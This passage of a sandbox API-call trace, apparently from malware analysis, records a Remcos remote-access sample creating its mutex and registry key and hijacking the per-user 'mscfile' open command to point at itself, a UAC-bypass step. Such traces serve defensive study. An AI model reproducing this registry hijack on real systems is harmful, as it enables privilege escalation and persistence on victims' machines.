(lpLibFileName="kernel32.dll") returned 0x769b0000 [0265.498] GetProcAddress (hModule=0x769b0000, lpProcName="GetConsoleWindow") returned 0x76a68235 [0265.498] GetStartupInfoW (in: lpStartupInfo=0x18fefc | out: lpStartupInfo=0x18fefc*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\99.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0265.500] FindResourceA (hModule=0x400000, lpName="SETTINGS", lpType=0xa) returned 0x472158 [0265.500] LoadResource (hModule=0x400000, hResInfo=0x472158) returned 0x4765cc [0265.500] LockResource (hResData=0x4765cc) returned 0x4765cc [0265.500] SizeofResource (hModule=0x400000, hResInfo=0x472158) returned 0x57d [0265.500] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x0, Size=0xd0) returned 0x32a5a8 [0265.500] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x0, Size=0xe0) returned 0x32a680 [0265.500] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x0, Size=0x4ac) returned 0x32a768 [0265.500] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x0, Size=0x4b0) returned 0x32ac20 [0265.502] HeapFree (in: hHeap=0x300000, dwFlags=0x0, lpMem=0x32a768 | out: hHeap=0x300000) returned 1 [0265.502] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x0, Size=0x4b0) returned 0x32a768 [0265.567] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x0, Size=0x30) returned 0x31db00 [0265.568] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x0, Size=0x18) returned 0x3284c8 [0265.570] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x0, Size=0x30) returned 0x31db38 [0265.570] HeapFree (in: hHeap=0x300000, dwFlags=0x0, lpMem=0x31db00 | out: hHeap=0x300000) returned 1 [0265.570] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x0, Size=0x30) returned 0x31db00 [0265.570] HeapFree (in: hHeap=0x300000, dwFlags=0x0, lpMem=0x3284c8 | out: hHeap=0x300000) returned 1 [0265.570] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x0, Size=0x48) returned 0x3195c8 [0265.571] HeapFree (in: hHeap=0x300000, dwFlags=0x0, lpMem=0x31db00 | out: hHeap=0x300000) returned 1 [0265.571] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x0, Size=0x60) returned 0x3027f8 [0265.571] HeapFree (in: hHeap=0x300000, dwFlags=0x0, lpMem=0x3195c8 | out: hHeap=0x300000) returned 1 [0265.571] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x0, Size=0x90) returned 0x32b0d8 [0265.572] HeapFree (in: hHeap=0x300000, dwFlags=0x0, lpMem=0x3027f8 | out: hHeap=0x300000) returned 1 [0265.572] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x0, Size=0xd8) returned 0x32b170 [0265.572] HeapFree (in: hHeap=0x300000, dwFlags=0x0, lpMem=0x32b0d8 | out: hHeap=0x300000) returned 1 [0265.572] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x0, Size=0x138) returned 0x32b250 [0265.572] HeapFree (in: hHeap=0x300000, dwFlags=0x0, lpMem=0x32b170 | out: hHeap=0x300000) returned 1 [0265.572] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x0, Size=0x20) returned 0x328e48 [0265.572] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x0, Size=0x20) returned 0x328e70 [0265.573] HeapFree (in: hHeap=0x300000, dwFlags=0x0, lpMem=0x328e48 | out: hHeap=0x300000) returned 1 [0265.573] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x0, Size=0x1c8) returned 0x32b390 [0265.573] HeapFree (in: hHeap=0x300000, dwFlags=0x0, lpMem=0x32b250 | out: hHeap=0x300000) returned 1 [0265.573] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x0, Size=0x20) returned 0x328e48 [0265.573] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x0, Size=0x20) returned 0x328e98 [0265.573] HeapFree (in: hHeap=0x300000, dwFlags=0x0, lpMem=0x328e48 | out: hHeap=0x300000) returned 1 [0265.574] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x0, Size=0x2a0) returned 0x32b0d8 [0265.574] HeapFree (in: hHeap=0x300000, dwFlags=0x0, lpMem=0x32b390 | out: hHeap=0x300000) returned 1 [0265.574] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x0, Size=0x30) returned 0x31db00 [0265.574] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x0, Size=0x30) returned 0x31db70 [0265.574] HeapFree (in: hHeap=0x300000, dwFlags=0x0, lpMem=0x31db00 | out: hHeap=0x300000) returned 1 [0265.574] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x0, Size=0x3f0) returned 0x32b380 [0265.574] HeapFree (in: hHeap=0x300000, dwFlags=0x0, lpMem=0x32b0d8 | out: hHeap=0x300000) returned 1 [0265.575] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x0, Size=0x5e8) returned 0x32b778 [0265.575] HeapFree (in: hHeap=0x300000, dwFlags=0x0, lpMem=0x32b380 | out: hHeap=0x300000) returned 1 [0265.575] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x0, Size=0x30) returned 0x31db00 [0265.575] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x0, Size=0x30) returned 0x31dba8 [0265.575] HeapFree (in: hHeap=0x300000, dwFlags=0x0, lpMem=0x31db00 | out: hHeap=0x300000) returned 1 [0265.575] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x0, Size=0x110) returned 0x32bd68 [0265.575] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x0, Size=0x110) returned 0x32be80 [0265.575] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x0, Size=0x80) returned 0x3027f8 [0265.576] HeapFree (in: hHeap=0x300000, dwFlags=0x0, lpMem=0x32bd68 | out: hHeap=0x300000) returned 1 [0265.576] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x0, Size=0x80) returned 0x32bd68 [0265.576] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x0, Size=0x110) returned 0x32b0d8 [0265.576] HeapFree (in: hHeap=0x300000, dwFlags=0x0, lpMem=0x3027f8 | out: hHeap=0x300000) returned 1 [0265.576] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x0, Size=0x110) returned 0x32b1f0 [0265.576] HeapFree (in: hHeap=0x300000, dwFlags=0x0, lpMem=0x32b0d8 | out: hHeap=0x300000) returned 1 [0265.577] HeapFree (in: hHeap=0x300000, dwFlags=0x0, lpMem=0x32a768 | out: hHeap=0x300000) returned 1 [0265.577] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x0, Size=0x20) returned 0x328e48 [0265.580] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Remcos-E6IJPZ\\", ulOptions=0x0, samDesired=0x20019, phkResult=0x18fc04 | out: phkResult=0x18fc04*=0x0) returned 0x2 [0265.580] OpenMutexA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Remcos_Mutex_Inj") returned 0x0 [0265.580] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Remcos-E6IJPZ\\", ulOptions=0x0, samDesired=0x20019, phkResult=0x18fc04 | out: phkResult=0x18fc04*=0x0) returned 0x2 [0265.580] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=1, lpName="Remcos-E6IJPZ") returned 0xcc [0265.580] GetLastError () returned 0x0 [0265.580] LoadLibraryA (lpLibFileName="Psapi.dll") returned 0x779b0000 [0265.584] GetProcAddress (hModule=0x779b0000, lpProcName="GetModuleFileNameExA") returned 0x779b15bc [0265.584] LoadLibraryA (lpLibFileName="Psapi.dll") returned 0x779b0000 [0265.585] GetProcAddress (hModule=0x779b0000, lpProcName="GetModuleFileNameExW") returned 0x779b13f0 [0265.585] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x779e0000 [0265.586] GetProcAddress (hModule=0x779e0000, lpProcName="NtUnmapViewOfSection") returned 0x779ffc70 [0265.586] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x769b0000 [0265.587] GetProcAddress (hModule=0x769b0000, lpProcName="GlobalMemoryStatusEx") returned 0x769ed4b4 [0265.588] GetModuleHandleA (lpModuleName="kernel32") returned 0x769b0000 [0265.589] GetProcAddress (hModule=0x769b0000, lpProcName="IsWow64Process") returned 0x769c193e [0265.589] GetModuleHandleA (lpModuleName="kernel32") returned 0x769b0000 [0265.590] GetProcAddress (hModule=0x769b0000, lpProcName="GetComputerNameExW") returned 0x769ebb86 [0265.590] LoadLibraryA (lpLibFileName="Shell32") returned 0x75cb0000 [0265.591] GetProcAddress (hModule=0x75cb0000, lpProcName="IsUserAnAdmin") returned 0x75d044f5 [0265.591] GetModuleHandleA (lpModuleName="kernel32") returned 0x769b0000 [0265.592] GetProcAddress (hModule=0x769b0000, lpProcName="SetProcessDEPPolicy") returned 0x769deb6a [0265.592] GetModuleHandleA (lpModuleName="user32") returned 0x773b0000 [0265.593] GetProcAddress (hModule=0x773b0000, lpProcName="EnumDisplayDevicesW") returned 0x773ee567 [0265.593] GetModuleHandleA (lpModuleName="user32") returned 0x773b0000 [0265.594] GetProcAddress (hModule=0x773b0000, lpProcName="EnumDisplayMonitors") returned 0x773d451a [0265.594] GetModuleHandleA (lpModuleName="user32") returned 0x773b0000 [0265.595] GetProcAddress (hModule=0x773b0000, lpProcName="GetMonitorInfoW") returned 0x773d3000 [0265.595] LoadLibraryA (lpLibFileName="Shlwapi.dll") returned 0x771d0000 [0265.596] GetProcAddress (hModule=0x771d0000, lpProcName=0xc) returned 0x771e158a [0265.596] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x46daf8, nSize=0x104 | out: lpFilename="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\99.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\99.exe")) returned 0x2b [0265.596] GetCurrentProcess () returned 0xffffffff [0265.596] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x18fc0c | out: Wow64Process=0x18fc0c*=1) returned 1 [0265.596] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20019, phkResult=0x18fc00 | out: phkResult=0x18fc00*=0xd4) returned 0x0 [0265.596] RegQueryValueExA (in: hKey=0xd4, lpValueName="ProductName", lpReserved=0x0, lpType=0x0, lpData=0x18f7fc, lpcbData=0x18fbfc*=0x400 | out: lpType=0x0, lpData=0x18f7fc*=0x57, lpcbData=0x18fbfc*=0x17) returned 0x0 [0265.597] RegCloseKey (hKey=0xd4) returned 0x0 [0265.597] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x0, Size=0x20) returned 0x328ec0 [0265.597] IsUserAnAdmin () returned 0 [0265.597] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Remcos-E6IJPZ\\", ulOptions=0x0, samDesired=0x20019, phkResult=0x18fc08 | out: phkResult=0x18fc08*=0x0) returned 0x2 [0265.597] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20019, phkResult=0x18fb98 | out: phkResult=0x18fb98*=0xdc) returned 0x0 [0265.598] RegQueryValueExA (in: hKey=0xdc, lpValueName="CurrentBuildNumber", lpReserved=0x0, lpType=0x0, lpData=0x18f794, lpcbData=0x18fb94*=0x400 | out: lpType=0x0, lpData=0x18f794*=0x37, lpcbData=0x18fb94*=0x5) returned 0x0 [0265.598] RegCloseKey (hKey=0xdc) returned 0x0 [0265.598] RegOpenKeyExA (in: hKey=0x80000000, lpSubKey="mscfile\\shell\\open\\command", ulOptions=0x0, samDesired=0x20019, phkResult=0x18fbc0 | out: phkResult=0x18fbc0*=0xd6) returned 0x0 [0265.599] RegQueryValueExA (in: hKey=0xd6, lpValueName="", lpReserved=0x0, lpType=0x0, lpData=0x18f7bc, lpcbData=0x18fbbc*=0x400 | out: lpType=0x0, lpData=0x18f7bc*=0x25, lpcbData=0x18fbbc*=0x26) returned 0x0 [0265.599] RegCloseKey (hKey=0xd6) returned 0x0 [0265.599] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x0, Size=0x30) returned 0x31db00 [0265.599] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x0, Size=0x30) returned 0x31dbe0 [0265.599] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x0, Size=0x30) returned 0x31dc18 [0265.599] RegCreateKeyA (in: hKey=0x80000001, lpSubKey="Software\\Remcos-E6IJPZ\\", phkResult=0x18f76c | out: phkResult=0x18f76c*=0xd4) returned 0x0 [0265.600] RegSetValueExA (in: hKey=0xd4, lpValueName="origmsc", Reserved=0x0, dwType=0x3, lpData=0x31dc18*, cbData=0x26 | out: lpData=0x31dc18*) returned 0x0 [0265.600] RegCloseKey (hKey=0xd4) returned 0x0 [0265.601] HeapFree (in: hHeap=0x300000, dwFlags=0x0, lpMem=0x31dc18 | out: hHeap=0x300000) returned 1 [0265.601] HeapFree (in: hHeap=0x300000, dwFlags=0x0, lpMem=0x31dbe0 | out: hHeap=0x300000) returned 1 [0265.601] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x0, Size=0x60) returned 0x3027f8 [0265.601] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Classes\\mscfile\\shell\\open\\command", phkResult=0x18fbac | out: phkResult=0x18fbac*=0xe0) returned 0x0 [0265.645] RegSetValueExW (in: hKey=0xe0, lpValueName="", Reserved=0x0, dwType=0x2, lpData="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\99.exe", cbData=0x58 | out: lpData="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\99.exe") returned 0x0 [0265.646] RegCloseKey (hKey=0xe0) returned 0x0 [0265.646] HeapFree (in: hHeap=0x300000, dwFlags=0x0, lpMem=0x3027f8 | out: hHeap=0x300000) returned 1 [0265.649] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x0, Size=0x20) returned 0x328f10 [0265.649] GetCurrentProcess () returned 0xffffffff [0265.649] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x18f8c4 | out: Wow64Process=0x18f8c4*=1) returned 1 [0265.649] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x0, Size=0x20) returned 0x328f38 [0265.649] GetEnvironmentStringsW () returned 0x32bf98* [0265.650] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x0, Size=0xb46) returned 0x32cae8 [0265.652] FreeEnvironmentStringsW (penv=0x32bf98) returned 1 [0265.652] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x9c) returned 0x32b0d8 [0265.652] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x3e) returned 0x3120a0 [0265.652] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x56) returned 0x32b180 [0265.652] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x6e) returned 0x3027f8 [0265.652] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x78) returned 0x30fdd0 [0265.652] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x62) returned 0x32bdf0 [0265.652] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x30) returned 0x31dbe0 [0265.652] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x48) returned 0x3195c8 [0265.652] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x28) returned 0x31d380 [0265.652] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x1a) returned 0x328f60 [0265.652] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x34) returned 0x32b308 [0265.652] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x5c) returned 0x32b348 [0265.652] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x32) returned 0x32b3b0 [0265.652] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x2e) returned 0x31dc18 [0265.652] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x1c) returned 0x328f88 [0265.652] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x12a) returned 0x32b3f0 [0265.652] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x7c) returned 0x32b528 [0265.652] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x36) returned 0x32b5b0 [0265.652] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x3a) returned 0x3120e8 [0265.652] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x90) returned 0x32b5f0 [0265.653] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x24) returned 0x31d3b0 [0265.653] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x30) returned 0x31dc50 [0265.653] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x36) returned 0x32b688 [0265.653] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x48) returned 0x319618 [0265.653] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x52) returned 0x32b6c8 [0265.653] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x3c) returned 0x312130 [0265.653] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0xd6) returned 0x32a768 [0265.653] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x2e) returned 0x31dc88 [0265.653] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x28) returned 0x31d3e0 [0265.653] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x1e) returned 0x328fb0 [0265.653] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x2c) returned 0x31dcc0 [0265.653] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x54) returned 0x32d650 [0265.654] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x52) returned 0x32d6b0 [0265.654] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x2c) returned 0x31dcf8 [0265.654] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x26) returned 0x31d410 [0265.654] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x3e) returned 0x312178 [0265.654] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x24) returned 0x31d440 [0265.654] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x30) returned 0x31dd30 [0265.654] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x8c) returned 0x32a848 [0265.655] HeapFree (in: hHeap=0x300000, dwFlags=0x0, lpMem=0x32cae8 | out: hHeap=0x300000) returned 1 [0265.655] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3280a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 31 [0265.655] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x3e) returned 0x3121c0 [0265.655] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3280a0, cbMultiByte=-1, lpWideCharStr=0x3121c0, cchWideChar=31 | out: lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData") returned 31 [0265.655] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x9c) returned 0x32a8e0 [0265.655] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x3e) returned 0x312208 [0265.655] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x56) returned 0x32d710 [0265.655] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x6e) returned 0x32a988 [0265.655] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x78) returned 0x30fe50 [0265.655] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x62) returned 0x32aa00 [0265.655] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x30) returned 0x31dd68 [0265.655] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x48) returned 0x319668 [0265.655] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x28) returned 0x31d470 [0265.655] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x1a) returned 0x328fd8 [0265.655] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x34) returned 0x32b728 [0265.655] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x5c) returned 0x32aa70 [0265.655] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x32) returned 0x32aad8 [0265.655] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x2e) returned 0x31dda0 [0265.655] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x1c) returned 0x329000 [0265.656] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x12a) returned 0x32e638 [0265.656] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x7c) returned 0x32ab18 [0265.656] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x36) returned 0x32aba0 [0265.656] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x3a) returned 0x312250 [0265.656] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x90) returned 0x32e770 [0265.656] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x24) returned 0x31d4a0 [0265.656] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x30) returned 0x31ddd8 [0265.656] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x36) returned 0x32bfb0 [0265.656] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x48) returned 0x3196b8 [0265.656] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x52) returned 0x32d770 [0265.656] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x3c) returned 0x312298 [0265.656] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0xd6) returned 0x32cf98 [0265.656] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x2e) returned 0x32e820 [0265.657] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x28) returned 0x31d4d0 [0265.657] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x1e) returned 0x329028 [0265.657] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x2c) returned 0x32e858 [0265.657] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x54) returned 0x32d7d0 [0265.657] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x52) returned 0x32d830 [0265.657] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x2c) returned 0x32e890 [0265.657] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x26) returned 0x31d500 [0265.657] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x3e) returned 0x3122e0 [0265.657] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x24) returned 0x31d530 [0265.657] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x30) returned 0x32e8c8 [0265.657] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x8c) returned 0x32d078 [0265.658] HeapFree (in: hHeap=0x300000, dwFlags=0x0, lpMem=0x312208 | out: hHeap=0x300000) returned 1 [0265.658] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x31d9b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 43 [0265.658] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x56) returned 0x32d890 [0265.658] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x31d9b0, cbMultiByte=-1, lpWideCharStr=0x32d890, cchWideChar=43 | out: lpWideCharStr="APPDATA=C:\\Users\\kEecfMwgj\\AppData\\Roaming") returned 43 [0265.658] HeapFree (in: hHeap=0x300000, dwFlags=0x0, lpMem=0x32d710 | out: hHeap=0x300000) returned 1 [0265.658] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3029d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 55 [0265.658] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x6e) returned 0x32d110 [0265.658] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3029d0, cbMultiByte=-1, lpWideCharStr=0x32d110, cchWideChar=55 | out: lpWideCharStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files") returned 55 [0265.659] HeapFree (in: hHeap=0x300000, dwFlags=0x0, lpMem=0x32a988 | out: hHeap=0x300000) returned 1 [0265.659] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x311f80, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 60 [0265.671] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x78) returned 0x30fed0 [0265.671] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x311f80, cbMultiByte=-1, lpWideCharStr=0x30fed0, cchWideChar=60 | out: lpWideCharStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files") returned 60 [0265.672] HeapFree (in: hHeap=0x300000, dwFlags=0x0, lpMem=0x30fe50 | out: hHeap=0x300000) returned 1 [0265.672] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3281f8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 49 [0265.672] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x62) returned 0x32a988 [0265.672] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3281f8, cbMultiByte=-1, lpWideCharStr=0x32a988, cchWideChar=49 | out: lpWideCharStr="CommonProgramW6432=C:\\Program Files\\Common Files") returned 49 [0265.672] HeapFree (in: hHeap=0x300000, dwFlags=0x0, lpMem=0x32aa00 | out: hHeap=0x300000) returned 1 [0265.672] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x302880, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0265.672] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x30) returned 0x32e900 [0265.673] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x302880, cbMultiByte=-1, lpWideCharStr=0x32e900, cchWideChar=24 | out: lpWideCharStr="COMPUTERNAME=Q9IATRKPRH") returned 24 [0265.673] HeapFree (in: hHeap=0x300000, dwFlags=0x0, lpMem=0x31dd68 | out: hHeap=0x300000) returned 1 [0265.673] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x31d320, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0265.673] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x48) returned 0x319708 [0265.673] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x31d320, cbMultiByte=-1, lpWideCharStr=0x319708, cchWideChar=36 | out: lpWideCharStr="ComSpec=C:\\Windows\\system32\\cmd.exe") returned 36 [0265.673] HeapFree (in: hHeap=0x300000, dwFlags=0x0, lpMem=0x319668 | out: hHeap=0x300000) returned 1 [0265.673] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x328238, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 20 [0265.673] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x28) returned 0x31d560 [0265.673] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x328238, cbMultiByte=-1, lpWideCharStr=0x31d560, cchWideChar=20 | out: lpWideCharStr="FP_NO_HOST_CHECK=NO") returned 20 [0265.674] HeapFree (in: hHeap=0x300000, dwFlags=0x0, lpMem=0x31d470 | out: hHeap=0x300000) returned 1 [0265.674] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x314ab0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13 [0265.674] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x1a) returned 0x329050 [0265.674] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x314ab0, cbMultiByte=-1, lpWideCharStr=0x329050, cchWideChar=13 | out: lpWideCharStr="HOMEDRIVE=C:") returned 13 [0265.674] HeapFree 